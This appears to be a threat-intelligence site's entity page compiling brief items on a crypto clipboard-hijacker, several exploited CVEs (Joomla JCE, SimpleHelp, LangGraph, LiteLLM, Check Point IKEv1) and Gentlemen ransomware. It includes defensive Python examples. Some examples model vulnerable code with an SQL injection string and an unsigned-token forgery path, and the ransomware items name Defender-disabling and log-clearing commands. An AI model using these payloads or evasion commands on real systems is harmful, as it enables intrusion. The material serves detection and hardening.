ctipilot.ch

Rust crypto clipboard-hijacker abusing VirusTotal community reputation (Check Point)

campaign · campaign:rust-crypto-clipper-virustotal-reputation

Coverage timeline: 1 brief (first 2026-06-18 → last 2026-06-18)
Briefs: 1 (1 distinct)
Sources cited: 41 (24 hosts)
Sections touched: 1 (research)
Co-occurring entities: 8 (see Related entities below)

Story timeline

  1. 2026-06-18 · CTI Daily Brief — 2026-06-18
     research · First coverage; fake-reputation distribution, VT community-vote manipulation

Where this entity is cited

  • research (1)

Source distribution

  • research.checkpoint.com 7 (17%)
  • blog.checkpoint.com 5 (12%)
  • thehackernews.com 5 (12%)
  • dexpose.io 2 (5%)
  • github.com 2 (5%)
  • horizon3.ai 2 (5%)
  • advisories.ncsc.nl 1 (2%)
  • bankinfosecurity.com 1 (2%)
  • other 16 (39%)

Related entities

All cited sources (41)

Items in briefs about Rust crypto clipboard-hijacker abusing VirusTotal community reputation (Check Point) (22)

Crypto clipboard-hijacker campaign weaponises VirusTotal community reputation to suppress detection

From CTI Daily Brief — 2026-06-18 · published 2026-06-18

Check Point Research detailed a Rust-based clipboard-hijacker campaign against cryptocurrency users whose distinguishing feature is the systematic manipulation of security-tool reputation signals (Check Point Research, 2026-06-17). The operator runs a network of GitHub ghost accounts, SourceForge pages with inflated download counts, AI-narrated YouTube channels and Telegram channels advertising fake crypto "edge" tools (Solana/Pump.fun sniper bots, Aviator predictors), funnelling victims through a WordPress phishing site to download the Rust payloads for Windows and macOS. Critically, the actor submits fake benign community votes and comments on VirusTotal to lower the apparent threat score, so triage analysts relying on community reputation see the sample as pre-vetted. The payload watches the clipboard for wallet-address patterns and silently substitutes attacker addresses. The operational takeaway for SOC triage: VirusTotal community votes/comments are not a trust signal for this malware class — weight first-party engine verdicts and behaviour instead, and add clipboard-modification (T1115) hooks and unsigned Rust binaries executing from user Downloads/Temp to the hunt hypotheses.
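Added example (not Check Point's or VirusTotal's code) of the triage point above: a verdict built from engine results and host behaviour that deliberately ignores the community-vote and reputation fields the campaign inflates. The field names follow the VirusTotal API v3 file object; the report contents, the sample name and the behaviour flags are constructed.

```python
from dataclasses import dataclass

# Constructed report for an illustrative sample: engines flag it, community votes say clean.
SAMPLE_REPORT = {
    "data": {
        "attributes": {
            "last_analysis_stats": {"malicious": 9, "suspicious": 2, "harmless": 0,
                                    "undetected": 58, "timeout": 1},
            "total_votes": {"harmless": 412, "malicious": 1},   # inflated by fake votes
            "reputation": 388,                                   # derived from those votes
            "meaningful_name": "pumpfun_sniper_pro.exe",        # constructed name
        }
    }
}

# Constructed host-side observations matching the hunt hypotheses on the page.
SAMPLE_BEHAVIOUR = {
    "clipboard_write_from_process": True,   # T1115-style clipboard modification
    "authenticode_signed": False,
    "run_from_user_download_or_temp": True,
}


@dataclass
class Triage:
    verdict: str            # "escalate" | "review" | "no-engine-signal"
    engine_ratio: float     # (malicious + suspicious) / engines that returned a result
    behaviour_hits: list
    community_says_clean: bool


def community_only_verdict(report):
    """What a vote-driven triage step does: trust the crowd counters (the manipulated field)."""
    votes = report["data"]["attributes"]["total_votes"]
    return "benign" if votes["harmless"] > 10 * max(votes["malicious"], 1) else "review"


def triage(report, behaviour):
    """Verdict from engine stats plus behaviour; votes/reputation are recorded but never weighted."""
    attrs = report["data"]["attributes"]
    stats = attrs["last_analysis_stats"]
    answered = stats["malicious"] + stats["suspicious"] + stats["harmless"] + stats["undetected"]
    ratio = (stats["malicious"] + stats["suspicious"]) / answered if answered else 0.0
    hits = [name for name, seen in behaviour.items() if seen]
    votes = attrs["total_votes"]
    community_clean = votes["harmless"] > votes["malicious"]
    if stats["malicious"] >= 5 or (ratio >= 0.05 and len(hits) >= 2):
        verdict = "escalate"
    elif stats["malicious"] + stats["suspicious"] > 0 or len(hits) >= 2:
        verdict = "review"
    else:
        verdict = "no-engine-signal"
    return Triage(verdict, round(ratio, 3), hits, community_clean)


if __name__ == "__main__":
    print("vote-driven:", community_only_verdict(SAMPLE_REPORT))
    print("engine+behaviour:", triage(SAMPLE_REPORT, SAMPLE_BEHAVIOUR))
```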

CVE-2026-48907 — Widget Factory Joomla Content Editor (JCE) before version 2.9.99.5: unauthenticated profile-import → PHP RCE (CVSS v4 10.0)

From CTI Daily Brief — 2026-06-17 · published 2026-06-17

CVE-2026-48907 is an improper-access-control flaw (CWE-284) in the JCE extension — one of the most widely installed third-party Joomla editors — that chains three weaknesses in the profile-import workflow: a missing authentication check on index.php?option=com_jce&task=profiles.import, absent file-extension validation, and disabled upload-safety controls (YesWeHack, 2026-06-16). An unauthenticated attacker imports a crafted editor profile that permits .php (or other executable) extensions for the Image Manager / File Browser plugin, then uploads a web shell that lands in images/ by default — yielding OS-level code execution as the web-server user. The vendor states the attacks are fully automated and that a site without a public registration form is not safe; any site that ran a JCE version before 2.9.99.5 should assume compromise and restore from a pre-breach backup after confirming the timeline from web logs (Widget Factory / JCE, 2026-06-03). CISA added it to the KEV catalog on 2026-06-16. Patched in JCE version 2.9.99.5 (2026-06-03), further hardened in 2.9.99.6 (2026-06-06). Detection: unauthenticated POSTs to profiles.import in web logs; unfamiliar auto-named profiles at the top of the JCE profile list with PHP uploads enabled; unexpected PHP files in images/, media/ or tmp/.
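Added example (not JCE's or YesWeHack's code) for the detection guidance above: a scan over combined-format access-log lines for POSTs to the profiles.import task and for script files requested under the upload directories, then a correlation of the two per source IP. The log lines are constructed; only the task string and the directory names come from the item.

```python
import re
from collections import defaultdict
from dataclasses import dataclass

# Apache/nginx "combined" format: ip ident user [ts] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
UPLOAD_DIRS = ("/images/", "/media/", "/tmp/")
SCRIPT_EXTS = (".php", ".phtml", ".phar", ".php5", ".php7")


@dataclass
class Finding:
    ip: str
    ts: str
    rule: str
    target: str


def scan_log(text):
    """Return one Finding per line that matches either JCE post-exploitation trace."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = m["target"]
        path, _, query = target.partition("?")
        if (m["method"] == "POST" and path.endswith("/index.php")
                and "option=com_jce" in query and "task=profiles.import" in query):
            # An access log does not show session state, so every hit is review-worthy:
            # a legitimate profile import is a rare administrator action.
            findings.append(Finding(m["ip"], m["ts"], "jce_profile_import_post", target))
        elif path.startswith(UPLOAD_DIRS) and path.lower().endswith(SCRIPT_EXTS):
            findings.append(Finding(m["ip"], m["ts"], "script_in_upload_dir", target))
    return findings


def hosts_with_full_chain(findings):
    """Source IPs that both hit profiles.import and requested a script under an upload dir."""
    rules = defaultdict(set)
    for f in findings:
        rules[f.ip].add(f.rule)
    return sorted(ip for ip, seen in rules.items()
                  if {"jce_profile_import_post", "script_in_upload_dir"} <= seen)


# Constructed sample traffic (documentation IP ranges), not real log data.
SAMPLE_LOG = """\
203.0.113.10 - - [16/Jun/2026:09:14:02 +0200] "POST /index.php?option=com_jce&task=profiles.import HTTP/1.1" 200 512 "-" "python-requests/2.31"
203.0.113.10 - - [16/Jun/2026:09:14:09 +0200] "GET /images/cache.php HTTP/1.1" 200 88 "-" "python-requests/2.31"
198.51.100.7 - - [16/Jun/2026:09:20:11 +0200] "GET /images/banners/logo.png HTTP/1.1" 200 4096 "https://example.org/" "Mozilla/5.0"
198.51.100.7 - - [16/Jun/2026:09:21:30 +0200] "GET /administrator/index.php?option=com_jce&view=profiles HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for f in hits:
        print(f)
    print("full chain from:", hosts_with_full_chain(hits))
```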

CVE Summary Table

Compact view of the actively-exploited / weaponised CVEs across this brief (full context in § 2 above and the § 4 updates).

| CVE | Product | CVSS | EPSS | KEV | Exploited | Patch | Source |
|---|---|---|---|---|---|---|---|
| CVE-2026-48907 | Joomla Content Editor (JCE) before version 2.9.99.5 | 10.0 (v4) | n/a | Yes (06-16) | Yes — automated | version 2.9.99.5 (06-03) | JCE |
| CVE-2026-39808 | Fortinet FortiSandbox — JRPC OS command injection | 9.8 | n/a | No | Yes (06-15) | Apr 2026 (FG-IR-26-100) | Help Net |
| CVE-2026-39813 | Fortinet FortiSandbox — JRPC path traversal / auth bypass | 9.1 | n/a | No | Yes (06-15) | Apr 2026 (FG-IR-26-112) | Help Net |
| CVE-2026-25089 | Fortinet FortiSandbox — web-UI command injection | 9.8 | n/a | No | Probable (faulty AI-built exploit) | 06-09 (FG-IR-26-141) | Security Affairs |
| CVE-2026-0257 | PAN-OS GlobalProtect — cookie auth bypass | 7.8 (v4) | n/a | Yes | Yes — since May 2026 | Vendor hotfixes | PAN PSIRT |
| CVE-2026-50751 | Check Point Security Gateway — IKEv1 auth bypass | 9.3 | n/a | No | PoC public | Hotfix (early June) | Help Net |

UPDATE: Check Point IKEv1 CVE-2026-50751 — public PoC raises exploitation risk

From CTI Daily Brief — 2026-06-17 · published 2026-06-17

UPDATE (originally covered 2026-06-09): NCSC-NL updated its advisory (NCSC-2026-0179, version 1.0.1) on 2026-06-16 to note that public proof-of-concept code is now available for the Check Point Security Gateway IKEv1 authentication bypass (CVE-2026-50751, CVSS 9.3), increasing the probability of exploitation (NCSC-NL, 2026-06-16).

The flaw lets an unauthenticated client abuse the IKEv1 negotiation to bypass peer-signature verification and impersonate any VPN identity configured for certificate or mixed authentication (username/password-only configurations are not affected); the public PoC follows watchTowr's earlier technical analysis (Help Net Security, 2026-06-12). Apply the early-June Check Point hotfix; where feasible disable IKEv1 legacy mode or enforce mandatory machine-certificate authentication, which is not bypassable by this flaw.

CVE-2026-50751 — Check Point Security Gateway: IKEv1 VPN authentication bypass exploited by a Qilin affiliate [SINGLE-SOURCE]

From CTI Weekly Summary — 2026-W24 (Jun 08 – Jun 14, 2026) · published 2026-06-14

If you did nothing this week: a Remote Access VPN gateway running the deprecated IKEv1 path is an active ransomware entry point — a Qilin affiliate is using this bypass for initial access.

Check Point disclosed and patched CVE-2026-50751 (CVSS 9.3) on 8 June — a certificate-validation logic flaw in the deprecated IKEv1 key exchange affecting Remote Access VPN and Mobile Access on Security Gateway (Check Point; daily 06-09). The disclosure noted exploitation by a Qilin ransomware affiliate, which puts this firmly in the inaction-equals-incident column: VPN gateways are the front door, and a ransomware crew is already through it on unpatched IKEv1 deployments.

Apply the hotfix and, where operationally possible, disable IKEv1 entirely in favour of IKEv2 — the flaw lives in a protocol path most estates no longer need. Hunt for anomalous VPN session establishment without corresponding successful certificate validation and for new Remote Access sessions from unexpected geographies.

CVE-2026-48558 — SimpleHelp RMM: unauthenticated OIDC authentication bypass yields a full technician session

From CTI Daily Brief — 2026-06-13 · published 2026-06-13

SimpleHelp, a self-hosted remote-support/RMM platform common in European MSP estates, fails to verify the cryptographic signature of OIDC identity tokens presented at login when OIDC authentication is enabled (Horizon3.ai, 2026-06-12). A remote, unauthenticated attacker who submits a forged, unsigned token carrying arbitrary identity claims obtains a fully authenticated Technician session with no user interaction; because signature verification is skipped entirely, any MFA enforced at the identity provider is also bypassed. SimpleHelp patched it in versions 5.5.16 and the 6.0 RC2 prerelease (Security Notice 2026-05); servers running 5.5.15 and earlier are affected (SimpleHelp, 2026-06-12). Horizon3 published detection IOCs for post-exploitation in MSP environments; neither the vendor notice nor the Horizon3 disclosure states a CVSS score at the time of writing. Maps to T1190 (Exploit Public-Facing Application) and T1078.004 (Valid Accounts). Technician access to an RMM server is a stepping stone into every downstream client estate, which is why MSP-tooling auth bypasses are a recurring initial-access vector. Detection: review SimpleHelp access logs for successful Technician authentications preceded by malformed/no-signature OIDC token exchanges and for new Technician sessions from unfamiliar source ranges. Hardening: patch immediately; until then disable OIDC and require SAML or local auth with MFA, and network-restrict the web interface.
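Added example (not SimpleHelp's or Horizon3's code) of the flaw pattern described above: a login path that reads identity claims without checking the token signature, next to a verifier that pins the algorithm, checks the signature and then the issuer, audience and expiry. HS256 with a constructed shared secret stands in for the RS256/JWKS verification a real OIDC relying party performs; the issuer, audience and claims are constructed.

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Optional


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def make_token(claims: dict, key: Optional[bytes] = None) -> str:
    """Build a JWS-style token; key=None yields an unsigned alg=none token (the forgery case)."""
    header = {"alg": "HS256" if key else "none", "typ": "JWT"}
    signing_input = (b64url_encode(json.dumps(header).encode()) + "."
                     + b64url_encode(json.dumps(claims).encode()))
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest() if key else b""
    return signing_input + "." + b64url_encode(sig)


class TokenError(Exception):
    pass


def vulnerable_login_claims(token: str) -> dict:
    """Models the bug: the payload is trusted as-is, so client-supplied claims log in."""
    _header, payload, _sig = token.split(".")
    return json.loads(b64url_decode(payload))


def verify_id_token(token: str, key: bytes, issuer: str, audience: str,
                    now: Optional[float] = None) -> dict:
    """Signature first, then the claims an OIDC relying party must check."""
    parts = token.split(".")
    if len(parts) != 3:
        raise TokenError("malformed token")
    h, p, s = parts
    header = json.loads(b64url_decode(h))
    if header.get("alg") != "HS256":   # pin the algorithm: rejects "none" and downgrades
        raise TokenError(f"unexpected alg {header.get('alg')!r}")
    expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        raise TokenError("signature mismatch")
    claims = json.loads(b64url_decode(p))
    if claims.get("iss") != issuer:
        raise TokenError("wrong issuer")
    aud = claims.get("aud")
    if audience not in (aud if isinstance(aud, list) else [aud]):
        raise TokenError("wrong audience")
    if float(claims.get("exp", 0)) <= (time.time() if now is None else now):
        raise TokenError("expired")
    return claims


def login_accepts(token: str, key: bytes, issuer: str, audience: str) -> bool:
    """True only when the token verifies end to end."""
    try:
        verify_id_token(token, key, issuer, audience)
        return True
    except (TokenError, ValueError, KeyError):
        return False
```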

CVE Summary Table

| CVE | Product | CVSS | EPSS | KEV | Exploited | Patch | Source |
|---|---|---|---|---|---|---|---|
| CVE-2026-48558 | SimpleHelp RMM (OIDC auth) | n/a | n/a | No | No (research PoC) | 5.5.16 / 6.0 RC2 | Horizon3.ai |
| CVE-2026-35273 | Oracle PeopleSoft PeopleTools (PSEMHUB) | 9.8 | n/a | Yes (2026-06-12) | Yes (UNC6240, 27 May) | OOB patch 2026-06-10 (8.61/8.62) | Mandiant/GTIG |

(CVE-2026-35273 carried as § 4 UPDATE; included here for the gate-clearing exploitation picture. CVEs that did not clear a § 2 inclusion gate — GitLab CVE-2026-6552 and the Check Point LangGraph chain — are noted in § 3 / § 7.)

Check Point chains SQL injection to RCE in LangGraph's checkpointer (CVE-2025-67644 + CVE-2026-28277)

From CTI Daily Brief — 2026-06-13 · published 2026-06-13

Check Point Research disclosed a vulnerability chain in LangGraph, the open-source stateful-agent framework published under LangChain (Check Point Research, 2026-06-11). CVE-2025-67644 is a SQL injection in the SQLite checkpointer's get_state_history() function, which interpolates user-controlled metadata filter keys directly into SQL without sanitisation. Chained with CVE-2026-28277, an unsafe msgpack deserialization in checkpoint loading, an attacker injects a crafted checkpoint row via the SQLi and triggers arbitrary Python module import and command execution when the application later loads that checkpoint — full server-side RCE (The Hacker News, 2026-06-12). A parallel SQLi in the Redis checkpointer is tracked as CVE-2026-27022. Exploitation requires a self-hosted deployment using the SQLite or Redis checkpointer that exposes get_state_history() to user-controlled filter input; PostgreSQL-backed deployments and LangChain's managed LangSmith cloud are not affected. Per Check Point, the fixes shipped in langgraph-checkpoint-sqlite 3.0.1 (CVE-2025-67644), langgraph 1.0.10 (CVE-2026-28277) and langgraph-checkpoint-redis 1.0.2 (CVE-2026-27022). Maps to T1190 and T1059.006. This is the substantive technical disclosure behind the agentic-AI attack surface that Swiss/EU public-sector AI pilots are increasingly building on. Defender action: pin the fixed versions, treat get_state_history() filter input as untrusted even in internal tooling, and never expose the state-history API unauthenticated.
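Added example (not LangGraph's code) of the bug class in the SQLi half of the chain above: a state-history query that splices a user-controlled metadata filter key into SQL text, beside a version that validates the key's shape and binds it as a parameter. The schema (a checkpoints table plus a key/value metadata table), the rows and the thread names are constructed; LangGraph's real tables differ.

```python
import re
import sqlite3

# Metadata keys are identifiers, so anything else is rejected before it reaches SQL.
SAFE_KEY = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def build_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE checkpoints (checkpoint_id TEXT PRIMARY KEY, thread_id TEXT NOT NULL);
        CREATE TABLE checkpoint_metadata (checkpoint_id TEXT, key TEXT, value TEXT);
        INSERT INTO checkpoints VALUES ('c1', 'thread-alice'), ('c2', 'thread-alice'), ('c3', 'thread-bob');
        INSERT INTO checkpoint_metadata VALUES
            ('c1', 'source', 'input'), ('c2', 'source', 'loop'), ('c3', 'source', 'input');
    """)
    return con


def history_vulnerable(con, thread_id: str, filters: dict) -> list:
    """The value is bound, but the filter KEY is interpolated: the caller controls SQL text."""
    sql = ("SELECT DISTINCT c.checkpoint_id FROM checkpoints c "
           "JOIN checkpoint_metadata m ON m.checkpoint_id = c.checkpoint_id "
           "WHERE c.thread_id = ?")
    params = [thread_id]
    for key, value in filters.items():
        sql += f" AND m.key = '{key}' AND m.value = ?"
        params.append(value)
    return sorted(row[0] for row in con.execute(sql, params))


def history_hardened(con, thread_id: str, filters: dict) -> list:
    """Keys are checked by shape AND bound as parameters; neither measure is relied on alone."""
    for key in filters:
        if not SAFE_KEY.match(key):
            raise ValueError(f"rejected metadata filter key: {key!r}")
    sql = "SELECT DISTINCT c.checkpoint_id FROM checkpoints c WHERE c.thread_id = ?"
    params = [thread_id]
    for key, value in filters.items():
        sql += (" AND EXISTS (SELECT 1 FROM checkpoint_metadata m "
                "WHERE m.checkpoint_id = c.checkpoint_id AND m.key = ? AND m.value = ?)")
        params += [key, value]
    return sorted(row[0] for row in con.execute(sql, params))


# Constructed filter key: closes the quoted literal and ORs the thread scoping away,
# so the vulnerable query returns every thread's checkpoints.
INJECTED_KEY = "x' OR 1=1 OR m.key = 'x"

if __name__ == "__main__":
    db = build_db()
    print("vulnerable, honest filter:", history_vulnerable(db, "thread-alice", {"source": "input"}))
    print("vulnerable, injected key:", history_vulnerable(db, "thread-alice", {INJECTED_KEY: "any"}))
    print("hardened, honest filter:", history_hardened(db, "thread-alice", {"source": "input"}))
```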

The Gentlemen ransomware: 478 claimed leak-site victims, self-propagating Go encryptor, operator publicly named

From CTI Daily Brief — 2026-06-12 · published 2026-06-12

The Gentlemen — tracked by Microsoft as Storm-2697 and by PRODAFT as Phantom Mantis / LARVA-368 — has claimed 478 victims on its leak site, with victims concentrated in Thailand, the UK, Brazil, Germany and India (The Hacker News, 2026-06-11). Microsoft's technical dissection details a Go encryptor obfuscated with Garble: per-file ephemeral Curve25519 key pairs with XChaCha20 (the ephemeral public key is appended to each encrypted file after an --eph-- marker), a --spread argument that "turns the malware from a single-host encryptor into a self-propagating worm" — simultaneously abusing network shares, scheduled tasks and remote process execution (T1021.002, T1053.005) — and a --full mode that spawns a SYSTEM-context child via a scheduled task named gentlemen_system (Microsoft Threat Intelligence, 2026-05-28). Defence evasion includes disabling Defender real-time monitoring (T1562.001), re-enabling SMBv1 and registry changes for anonymous share access; persistence runs via UpdateSystem/UpdateUser scheduled tasks and Run keys. On 10 June, KrebsOnSecurity published a deanonymisation tracing the operator handle "Hastalamuerte"/"Zeta88" to a named Russian national in Izhevsk, corroborated by Intel 471, Constella and Flashpoint (KrebsOnSecurity, 2026-06-10). Check Point Research documents the affiliate-favourable 90/10 revenue split and reports affiliates obtaining initial access via Fortinet SSL-VPN credentials (Check Point Research, 2026-05-13). Note: Krebs cites 332 published victims since mid-2025 versus the leak site's 478 claim — see § 7.

Why it matters to us: the initial-access pattern is concrete and huntable — review Fortinet SSL-VPN authentication logs for brute-force sequences followed by a first-time successful logon from a new ASN; alert on scheduled-task creation named gentlemen_system/UpdateSystem/UpdateUser (Windows Event ID 4698) and on shadow-copy deletion; treat SMBv1 re-enablement on any host as a high-confidence compromise signal.

Check Point: a TDS-gated ecosystem impersonates security tools (Ghidra, dnSpy, ILSpy) to deliver SessionGate, RemusStealer and a clipboard hijacker [SINGLE-SOURCE]

From CTI Daily Brief — 2026-06-10 · published 2026-06-10

Check Point Research details a malware-distribution operation that impersonates open-source reversing tools using CloudFront-hosted JavaScript to hijack download clicks and route victims through a Traffic Distribution System enforcing geo/device/VPN/frequency filtering before delivering one of three payloads (Check Point Research, 2026-06-03). The payloads are SessionGate (a per-session multi-stage loader with AES-encrypted modules), RemusStealer (targeting 20+ browsers, 220+ wallet extensions, 77 password-manager extensions and 18 2FA tools), and AnimateClipper (a clipboard hijacker with on-chain C2). The targeting is notable for this audience: it goes after security researchers and developers searching for trusted tools, bypassing standard phishing-awareness training (T1566, T1204, T1555, T1111). Hunt for ghidra/dnspy/ilspy download-then-execute chains under browser child processes and clipboard-API access from unexpected processes. [SINGLE-SOURCE] (Check Point primary research).

CVE-2026-50751 — Check Point Security Gateway: IKEv1 VPN authentication bypass, actively exploited by a Qilin affiliate

From CTI Daily Brief — 2026-06-09 · published 2026-06-09

Check Point disclosed and patched CVE-2026-50751 (CVSS 9.3) on 8 June 2026 — a logic-flow weakness in certificate validation in the deprecated IKEv1 key exchange affecting Remote Access VPN and Mobile Access deployments. An unauthenticated remote attacker can establish a VPN session without a valid user password; post-authentication activity is still required to reach internal resources (Check Point, 2026-06-08). NCSC-CH issued an Action-Required advisory the same day and links observed exploitation to a Qilin ransomware affiliate (NCSC-CH, 2026-06-08); CISA added the CVE to its KEV catalog on 8 June. Full technical treatment, exploitation prerequisites and hardening are in § 5 below. The companion CVE-2026-50752 (CVSS 7.4, site-to-site IKEv1 MitM, no observed exploitation) should be patched in the same window.

CVE-2026-42271 — BerriAI LiteLLM: low-privilege command injection to host RCE, added to CISA KEV

From CTI Daily Brief — 2026-06-09 · published 2026-06-09

CISA added CVE-2026-42271 to its KEV catalog on 8 June 2026, confirming active exploitation of a command-injection flaw in LiteLLM, the open-source AI gateway/proxy widely deployed to multiplex LLM API calls in enterprise AI stacks (GitHub Advisory GHSA-v4p8-mg3p-g94g). Two preview endpoints — POST /mcp-rest/test/connection and POST /mcp-rest/test/tools/list — accept a full MCP server configuration (command, args, env) in the request body; with stdio transport, the proxy spawns the supplied command on the host under the proxy's privileges. The endpoints were gated only by a valid API key with no role check, so any authenticated user (including low-privilege internal keys) could execute arbitrary commands. Horizon3.ai documents that chaining with CVE-2026-48710 (a Starlette Host-header validation bypass) makes the path unauthenticated (Horizon3.ai, 2026-06-01). Affected: LiteLLM 1.74.2 to < 1.83.7; fixed in 1.83.7, which adds role-based authorization on the MCP test endpoints.

CVE Summary Table

| CVE | Product | CVSS | EPSS | KEV | Exploited | Patch | Source |
|---|---|---|---|---|---|---|---|
| CVE-2026-50751 | Check Point Security Gateway (IKEv1 Remote Access / Mobile Access VPN) | 9.3 | n/a | Yes (2026-06-08) | Yes (since 2026-05-07, Qilin affiliate) | Hotfix sk185033 | Check Point |
| CVE-2026-42271 | BerriAI LiteLLM proxy (1.74.2 → < 1.83.7) | 8.7 | n/a | Yes (2026-06-08) | Yes (CISA-confirmed) | Upgrade to 1.83.7 | GitHub Advisory |

UPDATE: The Gentlemen ransomware — Microsoft publishes full technical dissection of the Storm-2697 Go-encryptor

From CTI Daily Brief — 2026-05-29 · published 2026-05-29

UPDATE (originally covered 2026-05-20; consolidated in weekly W21): Microsoft Threat Intelligence published a full dissection of The Gentlemen ransomware on 2026-05-28, giving Storm-2697 a much sharper technical profile than the victim-list reporting available in week 21. The encryptor is a single-binary Go executable (obfuscated through Garble to strip symbol tables), uses Curve25519 + XChaCha20 with per-file ephemeral keys (no bulk-decryption shortcut), and ships a self-propagation module that executes a series of lateral-movement techniques in parallel per host — PsExec, WMIC, scheduled tasks, services, PowerShell remoting — maximising the probability that at least one pivot path succeeds in any AD-joined environment.

Check Point Research's 2026-05-13 writeup adds the actor-side context that Microsoft's dissection does not — Check Point counts approximately 332 victim organisations on the operator's leak site, and documents that on Domain Admin compromise The Gentlemen deploys itself across the estate through a Group Policy Object linked at all relevant OUs. Huntress Labs' 2026-05-21 IR report corroborates the defense-evasion playbook: PowerShell disables Microsoft Defender real-time monitoring (Set-MpPreference -DisableRealtimeMonitoring), stops WinDefend, adds broad Add-MpPreference -ExclusionProcess and drive-level exclusions, disables Controlled Folder Access, and clears Security / System / Application event logs (EID 104, EID 1102). Huntress documented two April / May 2026 incidents in which the entry vector was RDP with compromised credentials, lateral movement reached domain controllers via the NETLOGON share and SCCM's CcmExec.exe, and process names were masqueraded as svchost32.exe. The DFIR Report's 2026-05-11 alert confirmed a related chain in which EtherRAT (delivered via a malicious Sysinternals MSI) and TukTuk C2 preceded Gentlemen deployment. Microsoft's Defender detection name is Ransom:Win64/Gentlemen.A; the recommended Attack Surface Reduction posture per Microsoft's ASR rules reference is "Block process creations originating from PsExec and WMI commands" combined with EDR-in-block-mode enforcement.

Material new development vs. last coverage: full encryption + propagation mechanism, named-cluster identity (Storm-2697), the GPO-spread pathway documented by Check Point Research, and Check Point's count of approximately 332 victims. Detection focus: hunt for wevtutil cl Security|System|Application chained with sc stop WinDefend or msconfig; flag svchost32.exe spawned outside %SystemRoot%\System32; alert on CcmExec.exe launching non-SCCM payloads. Hardening: enforce SMB signing via GPO, restrict GPO-creation rights to a hardened OU, enable Credential Guard, monitor Event ID 5136 for GPO modifications and Event ID 5140 for access to the hidden SMB share.

UPDATE: Nimbus Manticore (UNC1549 / Screening Serpens) — Check Point details MiniFast backdoor, Zoom-task hijacking and SEO-poisoning delivery

From CTI Daily Brief — 2026-05-27 · published 2026-05-27

UPDATE (originally covered 2026-05-23): Following Unit 42's coverage of UNC1549 / Screening Serpens AppDomainManager hijacking, Check Point Research (published 2026-05-22, widely re-reported this week) adds material technical depth on three February–April 2026 campaign waves keyed to Operation Epic Fury (Check Point Research, 2026-05-22; The Hacker News, 2026-05-26). The IRGC-affiliated actor replaced its MiniJunk family with a new backdoor, MiniFast — a 64-bit DLL with a single CheckForUpdates export and a JSON HTTP C2 using API-style endpoints (/agent/init, /agent/poll, /upload/) and a 14-opcode command set including DLL injection, UAC elevation and scheduled-task persistence.

Two persistence/delivery techniques are new versus the prior coverage: (1) Zoom scheduled-task hijacking (T1053.005) — instead of creating a suspicious new task, the malware watches for the legitimate ZoomUpdateTaskUser-<SID> task and hijacks it; (2) SEO poisoning (T1598.003) via a fake SQL Developer download domain ranked on Bing/DuckDuckGo, alongside T1574.008 AppDomain hijacking via redirected .config files. The loader chain validates parent=svchost.exe before proceeding and abused two SSL.com-issued code-signing certificates (Check Point Research, 2026-05-22). Hunt for ZoomUpdateTaskUser-* task modifications by non-Zoom processes, non-default AppDomainManager values in .NET .config files, and execution from user-writable AppData paths.

Check Point Q1 2026 State of Ransomware — ecosystem reconsolidates; LockBit returns with a deliberate Europe pivot

From CTI Weekly Summary — 2026-W22 (May 25 – May 31, 2026) · published 2026-05-25

Horizon research surfaced a quarterly report the dailies did not cover: Check Point's Q1 2026 State of Ransomware (published 2026-05-11). The synthesis that matters for a CH/EU public-sector SOC is structural, not the leaderboard: after two years of fragmentation driven by law-enforcement pressure on LockBit, ALPHV/BlackCat and others, the ecosystem is reconsolidating — the top ten leak-site operations now account for roughly 71% of listed victims, with Qilin holding the top spot for a third straight quarter and The Gentlemen (§ 7) entering the top three. The single most defender-relevant finding is LockBit's comeback paired with a deliberate geographic shift toward European and Latin American targets — which moves the rebuilt operation directly into this audience's threat model rather than leaving it a US-centric concern. Read alongside the Gentlemen internal-leak intelligence in § 7, the picture is a smaller number of higher-capability operations with European intent; prioritise the edge-appliance and identity hardening those operators are documented to rely on.

The Gentlemen / Storm-2697 — internal "Rocket" backend leaked by a rival; KELA and Check Point dissect the operator inner circle

From CTI Weekly Summary — 2026-W22 (May 25 – May 31, 2026) · published 2026-05-25

The most consequential campaign development of the window is one no daily captured: on 2026-05-04 a rival actor leaked The Gentlemen's internal Rocket database backend on underground forums, and KELA (2026-05-20) and Check Point ("Thus Spoke The Gentlemen", 2026-05-13) published deep analyses of the resulting six-month (Nov 2025 – Apr 2026) chat archive (key: item:the-gentlemen-raas-czech-university-and-swiss-engineering-fi). The leak exposes the inner circle (admin/infrastructure alias zeta88, also operating as hastalamuerte, alongside Wick, mAst3r, Kunder and others) and — far more useful to defenders — the operation's initial-access playbook: Fortinet and Cisco edge appliances, NTLM relay, harvested OWA / M365 credential logs, and GPO-based deployment of the encryptor. A linked affiliate runs a SystemBC SOCKS5 botnet of 1,570+ victims. This is an intelligence gift: every named access path maps to an existing hunt — prioritise edge-appliance patch state, NTLM-relay hardening (SMB/LDAP signing, channel binding) and anomalous-GPO-creation monitoring. Per Check Point's Q1 data the group sits at #3 globally (§ 6) — though its victims concentrate in Thailand, Brazil and India (US ~13%), so the European and Swiss listings carried over from W21 run against its centre of gravity, which is precisely what makes a CH/EU hit worth surfacing rather than treating as background.

ANNUAL REPORT — Check Point Research March-April 2026 AI Threat Landscape Digest: a single operator runs two AI platforms in parallel to breach nine Mexican government agencies [SINGLE-SOURCE]

From CTI Daily Brief — 2026-05-23 · published 2026-05-23

